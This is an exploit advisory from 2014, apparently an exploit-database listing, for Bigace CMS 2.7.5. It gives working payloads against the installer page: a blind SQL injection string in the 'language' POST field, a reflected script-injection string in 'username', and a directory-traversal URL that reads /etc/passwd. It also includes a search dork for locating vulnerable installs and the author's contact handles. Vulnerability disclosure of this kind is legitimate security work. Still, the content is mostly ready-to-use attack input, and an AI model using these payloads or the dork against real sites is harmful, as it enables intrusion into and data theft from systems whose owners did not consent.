Bigace version 2.7.5 suffers from cross site scripting, local file inclusion, and remote blind SQL injection vulnerabilities.
6563c4a382c4464440d2dde70009479e8fd3db7c9cecf167869d707212b06bd8
#######################################################################
#
# Exploit Title:
# Bigace 2.7.5 Blind Sql Injection
# Bigace 2.7.5 Cross site scripting
# Bigace 2.7.5 Local File Inclusion
# Date: 2014 18 March
# Author: Dr.3v1l
# Vendor Homepage: http://sourceforge.net/projects/bigace/files/bigace_2.7.5.zip
# Version : 2.7.5
# Tested on: Windows
# Category: webapps
# Google Dork: inurl:"/misc/install/index.php?menu=3"
#
#######################################################################
#
# [+] Exploit (SQL Injection):
#
# http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php
#
# URL encoded POST input language was set to :
# if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
#
#######################################################################
#
# [+] Exploit (XSS):
#
# http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php
#
# URL encoded POST input username was set to :
# "><script>alert(/xss/)</script>
# The input is reflected inside a tag parameter between double quotes.
#
#######################################################################
#
# [+] Exploit (LFI):
#
# http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=[LFI]
#
# http://<server>/bigace_2.7.5/bigace_install_2.7.5/public/index.php?menu=3&LANGUAGE=../../../../../../../../../../etc/passwd
#
#######################################################################
#
# [+] Contact Me :
#
# B.Devils.B@gmail.com
# Twitter.com/Doctor_3v1l
# Facebook.com/bdb.0web
# Facebook.com/groups/1427166220843499/
# IR.linkedin.com/in/hossein3v1l
# Hossein Hezami - Black_Devils B0ys
#
#######################################################################
# B.Devils.B Friends , R.H.H (UnderGround) , IeDB.IR , IrSecTeam
#######################################################################